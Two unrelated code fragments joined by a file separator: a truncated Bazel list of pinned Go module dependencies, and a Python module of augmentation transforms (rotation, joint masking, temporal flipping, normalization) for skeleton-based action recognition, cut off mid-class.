importpath = "github.com/Masterminds/sprig/v3",
sum = "h1:j7GpgZ7PdFqNsmncycTHsLmVPf5/3wJtlgW9TNDYD9Y=",
version = "v3.1.0",
)
go_repository(
name = "com_github_masterminds_squirrel",
importpath = "github.com/Masterminds/squirrel",
sum = "h1:K1NhbTO21BWG47IVR0OnIZuE0LZcXAYqywrC3Ko53KI=",
version = "v1.2.0",
)
go_repository(
name = "com_github_masterminds_vcs",
importpath = "github.com/Masterminds/vcs",
sum = "h1:NL3G1X7/7xduQtA2sJLpVpfHTNBALVNSjob6KEjPXNQ=",
version = "v1.13.1",
)
go_repository(
name = "com_github_mattn_go_colorable",
importpath = "github.com/mattn/go-colorable",
sum = "h1:/bC9yWikZXAL9uJdulbSfyVNIR3n3trXl+v8+1sx8mU=",
version = "v0.1.2",
)
go_repository(
name = "com_github_mattn_go_ieproxy",
importpath = "github.com/mattn/go-ieproxy",
sum = "h1:YioO2TiJyAHWHyCRQCP8jk5IzTqmsbGc5qQPIhHo6xs=",
version = "v0.0.0-20191113090002-7c0f6868bffe",
)
go_repository(
name = "com_github_mattn_go_isatty",
importpath = "github.com/mattn/go-isatty",
sum = "h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY=",
version = "v0.0.12",
)
go_repository(
name = "com_github_mattn_go_runewidth",
importpath = "github.com/mattn/go-runewidth",
sum = "h1:V2iyH+aX9C5fsYCpK60U8BYIvmhqxuOL3JZcqc1NB7k=",
version = "v0.0.6",
)
go_repository(
name = "com_github_mattn_go_shellwords",
importpath = "github.com/mattn/go-shellwords",
sum = "h1:Y7Xqm8piKOO3v10Thp7Z36h4FYFjt5xB//6XvOrs2Gw=",
version = "v1.0.10",
)
go_repository(
name = "com_github_mattn_go_sqlite3",
importpath = "github.com/mattn/go-sqlite3",
sum = "h1:u/x3mp++qUxvYfulZ4HKOvVO0JWhk7HtE8lWhbGz/Do=",
version = "v1.12.0",
)
go_repository(
name = "com_github_matttproud_golang_protobuf_extensions",
importpath = "github.com/matttproud/golang_protobuf_extensions",
sum = "h1:I0XW9+e1XWDxdcEniV4rQAIOPUGDq67JSCiRCgGCZLI=",
version = "v1.0.2-0.20181231171920-c182affec369",
)
go_repository(
name = "com_github_maxbrunsfeld_counterfeiter_v6",
importpath = "github.com/maxbrunsfeld/counterfeiter/v6",
sum = "h1:g+4J5sZg6osfvEfkRZxJ1em0VT95/UOZgi/l7zi1/oE=",
version = "v6.2.2",
)
go_repository(
name = "com_github_microsoft_go_winio",
importpath = "github.com/Microsoft/go-winio",
sum = "h1:ygIc8M6trr62pF5DucadTWGdEB4mEyvzi0e2nbcmcyA=",
version = "v0.4.15-0.20190919025122-fc70bd9a86b5",
)
go_repository(
name = "com_github_microsoft_hcsshim",
importpath = "github.com/Microsoft/hcsshim",
sum = "h1:VrfodqvztU8YSOvygU+DN1BGaSGxmrNfqOv5oOuX2Bk=",
version = "v0.8.9",
)
go_repository(
name = "com_github_miekg_dns",
importpath = "github.com/miekg/dns",
sum = "h1:Jm64b3bO9kP43ddLjL2EY3Io6bmy1qGb9Xxz6TqS6rc=",
version = "v1.1.22",
)
go_repository(
name = "com_github_mikefarah_yaml_v2",
importpath = "github.com/mikefarah/yaml/v2",
sum = "h1:eYqfooY0BnvKTJxr7+ABJs13n3dg9n347GScDaU2Lww=",
version = "v2.4.0",
)
go_repository(
name = "com_github_mikefarah_yq_v2",
importpath = "github.com/mikefarah/yq/v2",
sum = "h1:tajDonaFK6WqitSZExB6fKlWQy/yCkptqxh2AXEe3N4=",
version = "v2.4.1",
)
go_repository(
name = "com_github_minio_minio_go_v6",
importpath = "github.com/minio/minio-go/v6",
sum = "h1:bU4kIa/qChTLC1jrWZ8F+8gOiw1MClubddAJVR4gW3w=",
version = "v6.0.49",
)
go_repository(
name = "com_github_minio_sha256_simd",
importpath = "github.com/minio/sha256-simd",
sum = "h1:5QHSlgo3nt5yKOJrC7W8w7X+NFl8cMPZm96iu8kKUJU=",
version = "v0.1.1",
)
go_repository(
name = "com_github_mitchellh_cli",
importpath = "github.com/mitchellh/cli",
sum = "h1:iGBIsUe3+HZ/AD/Vd7DErOt5sU9fa8Uj7A2s1aggv1Y=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_copystructure",
importpath = "github.com/mitchellh/copystructure",
sum = "h1:Laisrj+bAB6b/yJwB5Bt3ITZhGJdqmxquMKeZ+mmkFQ=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_go_homedir",
importpath = "github.com/mitchellh/go-homedir",
sum = "h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y=",
version = "v1.1.0",
)
go_repository(
name = "com_github_mitchellh_go_testing_interface",
importpath = "github.com/mitchellh/go-testing-interface",
sum = "h1:fzU/JVNcaqHQEcVFAKeR41fkiLdIPrefOvVG1VZ96U0=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_go_wordwrap",
importpath = "github.com/mitchellh/go-wordwrap",
sum = "h1:6GlHJ/LTGMrIJbwgdqdl2eEH8o+Exx/0m8ir9Gns0u4=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_gox",
importpath = "github.com/mitchellh/gox",
sum = "h1:lfGJxY7ToLJQjHHwi0EX6uYBdK78egf954SQl13PQJc=",
version = "v0.4.0",
)
go_repository(
name = "com_github_mitchellh_hashstructure",
importpath = "github.com/mitchellh/hashstructure",
sum = "h1:hOY53G+kBFhbYFpRVxHl5eS7laP6B1+Cq+Z9Dry1iMU=",
version = "v0.0.0-20170609045927-2bca23e0e452",
)
go_repository(
name = "com_github_mitchellh_iochan",
importpath = "github.com/mitchellh/iochan",
sum = "h1:C+X3KsSTLFVBr/tK1eYN/vs4rJcvsiLU338UhYPJWeY=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_mapstructure",
importpath = "github.com/mitchellh/mapstructure",
sum = "h1:fmNYVwqnSfB9mZU6OS2O6GsXM+wcskZDuKQzvN1EDeE=",
version = "v1.1.2",
)
go_repository(
name = "com_github_mitchellh_osext",
importpath = "github.com/mitchellh/osext",
sum = "h1:2+myh5ml7lgEU/51gbeLHfKGNfgEQQIWrlbdaOsidbQ=",
version = "v0.0.0-20151018003038-5e2d6d41470f",
)
go_repository(
name = "com_github_mitchellh_reflectwalk",
importpath = "github.com/mitchellh/reflectwalk",
sum = "h1:9D+8oIskB4VJBN5SFlmc27fSlIBZaov1Wpk/IfikLNY=",
version = "v1.0.0",
)
go_repository(
name = "com_github_moby_term",
importpath = "github.com/moby/term",
sum = "h1:aY7OQNf2XqY/JQ6qREWamhI/81os/agb2BAGpcx5yWI=",
version = "v0.0.0-20200312100748-672ec06f55cd",
)
go_repository(
name = "com_github_modern_go_concurrent",
importpath = "github.com/modern-go/concurrent",
sum = "h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg=",
version = "v0.0.0-20180306012644-bacd9c7ef1dd",
)
go_repository(
name = "com_github_modern_go_reflect2",
importpath = "github.com/modern-go/reflect2",
sum = "h1:9f412s+6RmYXLWZSEzVVgPGK7C2PphHj5RJrvfx9AWI=",
version = "v1.0.1",
)
go_repository(
name = "com_github_morikuni_aec",
importpath = "github.com/morikuni/aec",
sum = "h1:nP9CBfwrvYnBRgY6qfDQkygYDmYwOilePFkwzv4dU8A=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mozillazg_go_cos",
importpath = "github.com/mozillazg/go-cos",
sum = "h1:RylOpEESdWMLb13bl0ADhko12uMN3JmHqqwFu4OYGBY=",
version = "v0.13.0",
)
go_repository(
name = "com_github_mozillazg_go_httpheader",
importpath = "github.com/mozillazg/go-httpheader",
sum = "h1:geV7TrjbL8KXSyvghnFm+NyTux/hxwueTSrwhe88TQQ=",
version = "v0.2.1",
)
go_repository(
name = "com_github_munnerz_goautoneg",
importpath = "github.com/munnerz/goautoneg",
sum = "h1:C3w9PqII01/Oq1c1nUAm88MOHcQC9l5mIlSMApZMrHA=",
version = "v0.0.0-20191010083416-a7dc8b61c822",
)
go_repository(
name = "com_github_mwitkow_go_conntrack",
importpath = "github.com/mwitkow/go-conntrack",
sum = "h1:KUppIJq7/+SVif2QVs3tOP0zanoHgBEVAwHxUSIzRqU=",
version = "v0.0.0-20190716064945-2f068394615f",
)
go_repository(
name = "com_github_mxk_go_flowrate",
importpath = "github.com/mxk/go-flowrate",
sum = "h1:y5//uYreIhSUg3J1GEMiLbxo1LJaP8RfCpH6pymGZus=",
version = "v0.0.0-20140419014527-cca7078d478f",
)
go_repository(
name = "com_github_nakagami_firebirdsql",
importpath = "github.com/nakagami/firebirdsql",
sum = "h1:P48LjvUQpTReR3TQRbxSeSBsMXzfK0uol7eRcr7VBYQ=",
version = "v0.0.0-20190310045651-3c02a58cfed8",
)
go_repository(
name = "com_github_ncw_swift",
importpath = "github.com/ncw/swift",
sum = "h1:4DQRPj35Y41WogBxyhOXlrI37nzGlyEcsforeudyYPQ=",
version = "v1.0.47",
)
go_repository(
name = "com_github_nvveen_gotty",
importpath = "github.com/Nvveen/Gotty",
sum = "h1:TngWCqHvy9oXAN6lEVMRuU21PR1EtLVZJmdB18Gu3Rw=",
version = "v0.0.0-20120604004816-cd527374f1e5",
)
go_repository(
name = "com_github_nxadm_tail",
importpath = "github.com/nxadm/tail",
sum = "h1:DQuhQpB1tVlglWS2hLQ5OV6B5r8aGxSrPc5Qo6uTN78=",
version = "v1.4.4",
)
go_repository(
name = "com_github_nytimes_gziphandler",
importpath = "github.com/NYTimes/gziphandler",
sum = "h1:ZUDjpQae29j0ryrS0u/B8HZfJBtBQHjqw2rQ2cqUQ3I=",
version = "v1.1.1",
)
go_repository(
name = "com_github_oklog_run",
importpath = "github.com/oklog/run",
sum = "h1:Ru7dDtJNOyC66gQ5dQmaCa0qIsAUFY3sFpK1Xk8igrw=",
version = "v1.0.0",
)
go_repository(
name = "com_github_oklog_ulid",
importpath = "github.com/oklog/ulid",
sum = "h1:EGfNDEx6MqHz8B3uNV6QAib1UR2Lm97sHi3ocA6ESJ4=",
version = "v1.3.1",
)
go_repository(
name = "com_github_olekukonko_tablewriter",
importpath = "github.com/olekukonko/tablewriter",
sum = "h1:sq53g+DWf0J6/ceFUHpQ0nAEb6WgM++fq16MZ91cS6o=",
version = "v0.0.2",
)
go_repository(
name = "com_github_oneofone_xxhash",
importpath = "github.com/OneOfOne/xxhash",
sum = "h1:U68crOE3y3MPttCMQGywZOLrTeF5HHJ3/vDBCJn9/bA=",
version = "v1.2.6",
)
go_repository(
name = "com_github_onsi_ginkgo",
importpath = "github.com/onsi/ginkgo",
sum = "h1:mFwc4LvZ0xpSvDZ3E+k8Yte0hLOMxXUlP+yXtJqkYfQ=",
version = "v1.12.1",
)
go_repository(
name = "com_github_onsi_gomega",
importpath = "github.com/onsi/gomega",
sum = "h1:o0+MgICZLuZ7xjH7Vx6zS/zcu93/BEp1VwkIW1mEXCE=",
version = "v1.10.1",
)
go_repository(
name = "com_github_opencontainers_go_digest",
importpath = "github.com/opencontainers/go-digest",
sum = "h1:WzifXhOVOEOuFYOJAW6aQqW0TooG2iki3E3Ii+WN7gQ=",
version = "v1.0.0-rc1",
)
go_repository(
name = "com_github_opencontainers_image_spec",
importpath = "github.com/opencontainers/image-spec",
sum = "h1:yN8BPXVwMBAm3Cuvh1L5XE8XpvYRMdsVLd82ILprhUU=",
version = "v1.0.2-0.20190823105129-775207bd45b6",
)
go_repository(
name = "com_github_opencontainers_runc",
importpath = "github.com/opencontainers/runc",
sum = "h1:GlxAyO6x8rfZYN9Tt0Kti5a/cP41iuiO2yYT0IJGY8Y=",
version = "v0.1.1",
)
go_repository(
name = "com_github_opencontainers_runtime_spec",
importpath = "github.com/opencontainers/runtime-spec",
sum = "h1:eNUVfm/RFLIi1G7flU5/ZRTHvd4kcVuzfRnL6OFlzCI=",
version = "v0.1.2-0.20190507144316-5b71a03e2700",
)
go_repository(
name = "com_github_opencontainers_runtime_tools",
importpath = "github.com/opencontainers/runtime-tools",
sum = "h1:H7DMc6FAjgwZZi8BRqjrAAHWoqEr5e5L6pS4V0ezet4=",
version = "v0.0.0-20181011054405-1d69bd0f9c39",
)
go_repository(
name = "com_github_openshift_origin",
importpath = "github.com/openshift/origin",
sum = "h1:KLVRXtjLhZHVtrcdnuefaI2Bf182EEiTfEVDHokoyng=",
version = "v0.0.0-20160503220234-8f127d736703",
)
go_repository(
name = "com_github_openshift_prom_label_proxy",
importpath = "github.com/openshift/prom-label-proxy",
sum = "h1:GW8OxGwBbI2kCqjb5PQfVXRAuCJbYyX1RYs9R3ISjck=",
version = "v0.1.1-0.20191016113035-b8153a7f39f1",
)
go_repository(
name = "com_github_opentracing_basictracer_go",
importpath = "github.com/opentracing/basictracer-go",
sum = "h1:YyUAhaEfjoWXclZVJ9sGoNct7j4TVk7lZWlQw5UXuoo=",
version = "v1.0.0",
)
go_repository(
name = "com_github_opentracing_contrib_go_stdlib",
importpath = "github.com/opentracing-contrib/go-stdlib",
sum = "h1:QsgXACQhd9QJhEmRumbsMQQvBtmdS0mafoVEBplWXEg=",
version = "v0.0.0-20190519235532-cf7a6c988dc9",
)
go_repository(
name = "com_github_opentracing_opentracing_go",
importpath = "github.com/opentracing/opentracing-go",
sum = "h1:pWlfV3Bxv7k65HYwkikxat0+s3pV4bsqf19k25Ur8rU=",
version = "v1.1.0",
)
go_repository(
name = "com_github_openzipkin_zipkin_go",
importpath = "github.com/openzipkin/zipkin-go",
sum = "h1:yXiysv1CSK7Q5yjGy1710zZGnsbMUIjluWBxtLXHPBo=",
version = "v0.1.6",
)
go_repository(
name = "com_github_operator_framework_api",
importpath = "github.com/operator-framework/api",
sum = "h1:Rg+6sdgP7KMOUGNP83s+5gPo7IwTH3mZ85ZFml9SPXY=",
version = "v0.3.13",
)
go_repository(
name = "com_github_operator_framework_operator_registry",
importpath = "github.com/operator-framework/operator-registry",
sum = "h1:GH7essHnVRP4kYgAWYV9obsS0Cnaj/KjT3BmQXmKAOE=",
version = "v1.13.4",
)
go_repository(
name = "com_github_operator_framework_operator_sdk",
importpath = "github.com/operator-framework/operator-sdk",
sum = "h1:QI6k+WBDAXagx2OunEajQLa8LZwmRXu+x/SwmVZ/CCw=",
version = "v0.19.4",
)
go_repository(
name = "com_github_otiai10_copy",
importpath = "github.com/otiai10/copy",
sum = "h1:HvG945u96iNadPoG2/Ja2+AUJeW5YuFQMixq9yirC+k=",
version = "v1.2.0",
)
go_repository(
name = "com_github_otiai10_curr",
importpath = "github.com/otiai10/curr",
sum = "h1:TJIWdbX0B+kpNagQrjgq8bCMrbhiuX73M2XwgtDMoOI=",
version = "v1.0.0",
)
go_repository(
name = "com_github_otiai10_mint",
importpath = "github.com/otiai10/mint",
sum = "h1:BCmzIS3n71sGfHB5NMNDB3lHYPz8fWSkCAErHed//qc=",
version = "v1.3.1",
)
go_repository(
name = "com_github_pascaldekloe_goe",
importpath = "github.com/pascaldekloe/goe",
sum = "h1:cBOtyMzM9HTpWjXfbbunk26uA6nG3a8n06Wieeh0MwY=",
version = "v0.1.0",
)
go_repository(
name = "com_github_pborman_uuid",
importpath = "github.com/pborman/uuid",
sum = "h1:J7Q5mO4ysT1dv8hyrUGHb9+ooztCXu1D8MY8DZYsu3g=",
version = "v1.2.0",
)
go_repository(
name = "com_github_pelletier_go_toml",
importpath = "github.com/pelletier/go-toml",
sum = "h1:T5zMGML61Wp+FlcbWjRDT7yAxhJNAiPPLOFECq181zc=",
version = "v1.2.0",
)
go_repository(
name = "com_github_peterbourgon_diskv",
importpath = "github.com/peterbourgon/diskv",
sum = "h1:UBdAOUP5p4RWqPBg048CAvpKN+vxiaj6gdUUzhl4XmI=",
version = "v2.0.1+incompatible",
)
go_repository(
name = "com_github_phayes_freeport",
importpath = "github.com/phayes/freeport",
sum = "h1:JhzVVoYvbOACxoUmOs6V/G4D5nPVUW73rKvXxP4XUJc=",
version = "v0.0.0-20180830031419-95f893ade6f2",
)
go_repository(
name = "com_github_pierrec_lz4",
importpath = "github.com/pierrec/lz4",
sum = "h1:2xWsjqPFWcplujydGg4WmhC/6fZqK42wMM8aXeqhl0I=",
version = "v2.0.5+incompatible",
)
go_repository(
name = "com_github_pkg_errors",
importpath = "github.com/pkg/errors",
sum = "h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=",
version = "v0.9.1",
)
go_repository(
name = "com_github_pmezard_go_difflib",
importpath = "github.com/pmezard/go-difflib",
sum = "h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=",
version = "v1.0.0",
)
go_repository(
name = "com_github_posener_complete",
importpath = "github.com/posener/complete",
sum = "h1:ccV59UEOTzVDnDUEFdT95ZzHVZ+5+158q8+SJb2QV5w=",
version = "v1.1.1",
)
go_repository(
name = "com_github_pquerna_cachecontrol",
importpath = "github.com/pquerna/cachecontrol",
sum = "h1:0XM1XL/OFFJjXsYXlG30spTkV/E9+gmd5GD1w2HE8xM=",
version = "v0.0.0-20171018203845-0dec1b30a021",
)
go_repository(
name = "com_github_prometheus_alertmanager",
importpath = "github.com/prometheus/alertmanager",
sum = "h1:PBMNY7oyIvYMBBIag35/C0hO7xn8+35p4V5rNAph5N8=",
version = "v0.20.0",
)
go_repository(
name = "com_github_prometheus_client_golang",
importpath = "github.com/prometheus/client_golang",
sum = "h1:NTGy1Ja9pByO+xAeH/qiWnLrKtr3hJPNjaVUwnjpdpA=",
version = "v1.7.1",
)
go_repository(
name = "com_github_prometheus_client_model",
importpath = "github.com/prometheus/client_model",
sum = "h1:uq5h0d+GuxiXLJLNABMgp2qUWDPiLvgCzz2dUR+/W/M=",
version = "v0.2.0",
)
go_repository(
name = "com_github_prometheus_common",
importpath = "github.com/prometheus/common",
sum = "h1:RyRA7RzGXQZiW+tGMr7sxa85G1z0yOpM1qq5c8lNawc=",
version = "v0.10.0",
)
go_repository(
name = "com_github_prometheus_procfs",
importpath = "github.com/prometheus/procfs",
sum = "h1:F0+tqvhOksq22sc6iCHF5WGlWjdwj92p0udFh1VFBS8=",
version = "v0.1.3",
)
go_repository(
name = "com_github_prometheus_prometheus",
importpath = "github.com/prometheus/prometheus",
sum = "h1:EekL1S9WPoPtJL2NZvL+xo38iMpraOnyEHOiyZygMDY=",
version = "v2.3.2+incompatible",
)
go_repository(
name = "com_github_prometheus_tsdb",
importpath = "github.com/prometheus/tsdb",
sum = "h1:YZcsG11NqnK4czYLrWd9mpEuAJIHVQLwdrleYfszMAA=",
version = "v0.7.1",
)
go_repository(
name = "com_github_puerkitobio_purell",
importpath = "github.com/PuerkitoBio/purell",
sum = "h1:WEQqlqaGbrPkxLJWfBwQmfEAE1Z7ONdDLqrN38tNFfI=",
version = "v1.1.1",
)
go_repository(
name = "com_github_puerkitobio_urlesc",
importpath = "github.com/PuerkitoBio/urlesc",
sum = "h1:d+Bc7a5rLufV/sSk/8dngufqelfh6jnri85riMAaF/M=",
version = "v0.0.0-20170810143723-de5bf2ad4578",
)
go_repository(
name = "com_github_rcrowley_go_metrics",
importpath = "github.com/rcrowley/go-metrics",
sum = "h1:9ZKAASQSHhDYGoxY8uLVpewe1GDZ2vu2Tr/vTdVAkFQ=",
version = "v0.0.0-20181016184325-3113b8401b8a",
)
go_repository(
name = "com_github_remyoudompheng_bigfft",
importpath = "github.com/remyoudompheng/bigfft",
sum = "h1:/NRJ5vAYoqz+7sG51ubIDHXeWO8DlTSrToPu6q11ziA=",
version = "v0.0.0-20170806203942-52369c62f446",
)
go_repository(
name = "com_github_robfig_cron",
importpath = "github.com/robfig/cron",
sum = "h1:NZInwlJPD/G44mJDgBEMFvBfbv/QQKCrpo+az/QXn8c=",
version = "v0.0.0-20170526150127-736158dc09e1",
)
go_repository(
name = "com_github_rogpeppe_fastuuid",
importpath = "github.com/rogpeppe/fastuuid",
sum = "h1:Ppwyp6VYCF1nvBTXL3trRso7mXMlRrw9ooo375wvi2s=",
version = "v1.2.0",
)
go_repository(
| |
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/11/17 19:51
# @Author : Jun
import random
import numpy as np
import math
from math import sin, cos
import random
import torch
from torch import nn
import torch.nn.functional as F
def aug_look(name, args1=None, args2=None):
    """Factory mapping an augmentation name to a configured transform instance.

    Matching is by substring containment (e.g. any name containing
    'selectFrames' hits the SelectFrames branch), preserved for compatibility
    with callers that pass decorated names.

    :param name: augmentation identifier (substring-matched, see above)
    :param args1: first constructor argument for the chosen transform
    :param args2: second constructor argument, where applicable
    :return: a callable transform object
    :raises ValueError: if `name` matches no known augmentation
        (was IndentationError, which is a syntax-error type and nonsensical here)
    """
    if 'selectFrames' in name:
        return SelectFrames(args1)
    elif 'subtract' in name:
        return Subtract(args1)
    elif 'randomFlip' in name:
        # args intentionally ignored: flip uses its default probability
        return RandomHorizontalFlip()
    elif 'zeroOutAxis' in name:
        return Zero_out_axis(args1)
    elif 'rotate' in name:
        return Rotate(args1, args2)
    elif 'zeroOutJoints' in name:
        return Zero_out_joints(args1, args2)
    elif 'gausNoise' in name:
        # args intentionally ignored: noise uses its default mean/std
        return Gaus_noise()
    elif 'gausFilter' in name:
        # args intentionally ignored: filter uses its default kernel/sigmas
        return Gaus_filter()
    elif 'shear' in name:
        return Shear(args1, args2)
    else:
        raise ValueError(f"unknown augmentation name: {name!r}")
class NormalizeC(object):
    """Channel-wise standardization: (tensor - mean) / std, in torch.

    Expects a tensor of rank >= 3 whose leading dimension is the channel
    axis (mean/std are broadcast as mean[:, None, None]).
    """

    def __init__(self, mean, std, inplace=False):
        self.mean = mean
        self.std = std
        self.inplace = inplace

    def __call__(self, tensor):
        # work on a clone unless the caller explicitly opted into in-place
        target = tensor if self.inplace else tensor.clone()
        mean = torch.as_tensor(self.mean, dtype=target.dtype, device=target.device)
        std = torch.as_tensor(self.std, dtype=target.dtype, device=target.device)
        target.sub_(mean[:, None, None]).div_(std[:, None, None])
        return target
class NormalizeCV(object):
    """Out-of-place channel normalization: (tensor - mean) / std.

    Fix: the original __call__ reassigned the converted tensors back onto
    self.mean / self.std, silently mutating the transform's configuration on
    first use; conversion is now kept in locals so the instance stays
    reusable and its attributes keep the values passed to __init__.

    Note: the `inplace` flag is kept for interface compatibility, but the
    division always produces a new tensor, so the input is never modified.
    """

    def __init__(self, mean, std, inplace=False):
        self.mean = mean
        self.std = std
        self.inplace = inplace

    def __call__(self, tensor):
        if not self.inplace:
            tensor = tensor.clone()
        dtype = tensor.dtype
        mean = torch.as_tensor(self.mean, dtype=dtype, device=tensor.device)
        std = torch.as_tensor(self.std, dtype=dtype, device=tensor.device)
        return (tensor - mean) / std
# numpy
class Skeleton2Image(object):
    """Flatten a skeleton array (C, T, V, M) into image-like (C, T, V*M).

    Operates on numpy arrays; the joint and person axes are merged.
    """

    def __call__(self, data_numpy):
        channels, frames, joints, persons = data_numpy.shape
        return data_numpy.reshape(channels, frames, joints * persons)
# tensor
class Image2skeleton(object):
    """Reshape an image-like tensor (C, T, W) back to skeleton form.

    Assumes the last axis packs 25 joints x 2 persons (W == 50), i.e. the
    inverse of Skeleton2Image for this dataset layout.
    """

    def __call__(self, tensor):
        channels, frames, _ = tensor.size()
        return tensor.view(channels, frames, 25, 2)
class SelectFrames(object):
    """Keep only the first `frames` time steps of a (C, T, V, M) array."""

    def __init__(self, frames):
        # number of leading frames to retain
        self.frames = frames

    def __call__(self, data_numpy):
        return data_numpy[:, 0:self.frames, :, :]
class ToTensor(object):
    """Wrap a numpy array as a torch tensor.

    Uses torch.from_numpy, so the tensor shares memory with the array
    (no copy is made).
    """

    def __call__(self, data_numpy):
        return torch.from_numpy(data_numpy)
class Subtract(object):
    """Re-center the skeleton: subtract one reference joint from all joints.

    Fixes: `joint == None` -> `joint is None` (PEP 8 identity check), and the
    per-joint Python loop is replaced with an equivalent broadcast subtraction.
    Output is float64 regardless of input dtype, matching the original
    (which filled a np.zeros buffer).

    :param joint: index of the reference joint; a random joint in [0, 24]
        (25-joint skeleton assumed) is drawn once at construction if omitted.
    """

    def __init__(self, joint=None):
        if joint is None:
            self.joint = random.randint(0, 24)
        else:
            self.joint = joint

    def __call__(self, data_numpy):
        C, T, V, M = data_numpy.shape
        x_new = np.zeros((C, T, V, M))
        # keepdims-style slice so the reference joint broadcasts over V
        x_new[:] = data_numpy - data_numpy[:, :, self.joint:self.joint + 1, :]
        return x_new
class Subsample(object):
    """Zero out all but a random subset of frames (kept frames unchanged).

    Fixes: the original stored the first randomly drawn count on
    self.time_range, so one instance reused the same count forever (and a
    count drawn for one clip length leaked into clips of other lengths).
    The random count is now a local, drawn fresh per call; an explicit
    `time_range` still behaves as before. Also `== None` -> `is None`.

    :param time_range: number of frames to keep; drawn uniformly from
        [1, T] on every call when omitted.
    """

    def __init__(self, time_range=None):
        self.time_range = time_range

    def __call__(self, data_numpy):
        C, T, V, M = data_numpy.shape
        if self.time_range is None:
            count = random.randint(1, T)
        else:
            count = self.time_range
        kept = sorted(random.sample(range(T), count))
        x_new = np.zeros((C, T, V, M))
        x_new[:, kept, :, :] = data_numpy[:, kept, :, :]
        return x_new
class Zero_out_axis(object):
    """Zero one coordinate channel (0=x, 1=y, 2=z) of a (C, T, V, M) array.

    Fix: `!= None` -> `is not None`. When no axis is given at construction,
    a fresh random axis is drawn on every call (original behavior kept).
    Returns a copy; the input is not modified.
    """

    def __init__(self, axis=None):
        self.first_axis = axis

    def __call__(self, data_numpy):
        if self.first_axis is not None:
            axis_next = self.first_axis
        else:
            axis_next = random.randint(0, 2)
        temp = data_numpy.copy()
        temp[axis_next] = 0
        return temp
class Diff_on_axis(object):
    """Replace one coordinate channel with its first temporal difference.

    out[axis, t] = x[axis, t+1] - x[axis, t], with the last frame zeroed;
    the other channels are untouched. Fixes: `!= None` -> `is not None`,
    and the per-frame Python loop is replaced by an equivalent vectorized
    slice subtraction.
    """

    def __init__(self, axis=None):
        self.first_axis = axis

    def __call__(self, data_numpy):
        if self.first_axis is not None:
            axis_next = self.first_axis
        else:
            axis_next = random.randint(0, 2)
        temp = data_numpy.copy()
        # vectorized equivalent of the original t / t+1 loop
        temp[axis_next, :-1] = data_numpy[axis_next, 1:] - data_numpy[axis_next, :-1]
        temp[axis_next, -1] = 0
        return temp
class RandomHorizontalFlip(object):
    """Reverse the temporal order of a (C, T, V, M) clip with probability p.

    NOTE(review): despite the name this flips along time, not a spatial
    axis — name kept for caller compatibility. Always returns a new array.
    """

    def __init__(self, p=0.5):
        self.p = p

    def __call__(self, data_numpy):
        if random.random() >= self.p:
            return data_numpy.copy()
        # reversed view of the time axis, copied so a fresh array is returned
        return data_numpy[:, ::-1, :, :].copy()
class Rotate(object):
    """Rotate all 3D coordinates of a (3, T, V, M) array about one axis.

    :param axis: 0/1/2 for x/y/z; random in [0, 2] per call if omitted.
    :param angle: degrees. A scalar is used as-is; a list [center, spread]
        draws uniformly from [center - spread, center + spread]; if omitted,
        a random angle in [0, 30] degrees is drawn per call.

    Fixes: `!= None` -> `is not None`, and an explicit ValueError for an
    invalid axis (the original fell through all three `if`s and crashed
    with UnboundLocalError on `R`).
    """

    def __init__(self, axis=None, angle=None):
        self.first_axis = axis
        self.first_angle = angle

    def __call__(self, data_numpy):
        if self.first_axis is not None:
            axis_next = self.first_axis
        else:
            axis_next = random.randint(0, 2)

        if self.first_angle is None:
            angle_next = random.uniform(0, 30)
        elif isinstance(self.first_angle, list):
            center, spread = self.first_angle
            angle_next = random.uniform(center - spread, center + spread)
        else:
            angle_next = self.first_angle

        rad = math.radians(angle_next)
        if axis_next == 0:    # rotate about x
            R = np.array([[1, 0, 0],
                          [0, cos(rad), sin(rad)],
                          [0, -sin(rad), cos(rad)]])
        elif axis_next == 1:  # rotate about y
            R = np.array([[cos(rad), 0, -sin(rad)],
                          [0, 1, 0],
                          [sin(rad), 0, cos(rad)]])
        elif axis_next == 2:  # rotate about z
            R = np.array([[cos(rad), sin(rad), 0],
                          [-sin(rad), cos(rad), 0],
                          [0, 0, 1]])
        else:
            raise ValueError(f"axis must be 0, 1 or 2, got {axis_next}")

        # move the channel axis last, apply R^T on the right, move it back
        temp = np.dot(data_numpy.copy().transpose([1, 2, 3, 0]), R.transpose())
        return temp.transpose(3, 0, 1, 2)
class Zero_out_joints(object):
    """Zero a set of joints over a set of frames of a (C, T, V, M) array.

    :param joint_list: explicit list of joint indices to zero, or an int N
        meaning "N random joints"; if omitted, 5-15 random joints per call.
    :param time_range: explicit list of frame indices, or an int meaning
        "that many random frames"; if omitted, 20-50 random frames for short
        clips (T < 100), else 50-100.

    Fixes: all `!= None` / `== None` comparisons replaced with identity
    checks; random sampling simplified to sample directly from range.
    Returns a copy; the input is not modified.
    """

    def __init__(self, joint_list=None, time_range=None):
        self.first_joint_list = joint_list
        self.first_time_range = time_range

    def __call__(self, data_numpy):
        temp = data_numpy.copy()
        C, T, V, M = data_numpy.shape

        if self.first_joint_list is None:
            joint_list_ = sorted(random.sample(range(V), random.randint(5, 15)))
        elif isinstance(self.first_joint_list, int):
            joint_list_ = sorted(random.sample(range(V), self.first_joint_list))
        else:
            joint_list_ = self.first_joint_list

        if self.first_time_range is None:
            count = random.randint(20, 50) if T < 100 else random.randint(50, 100)
            time_range_ = sorted(random.sample(range(T), count))
        elif isinstance(self.first_time_range, int):
            time_range_ = sorted(random.sample(range(T), self.first_time_range))
        else:
            time_range_ = self.first_time_range

        # two-step fancy indexing: chained fancy assignment would write to a
        # temporary, so extract the frame block, zero the joints, write back
        sub = temp[:, time_range_, :, :].copy()
        sub[:, :, joint_list_, :] = 0
        temp[:, time_range_, :, :] = sub
        return temp
class Gaus_noise(object):
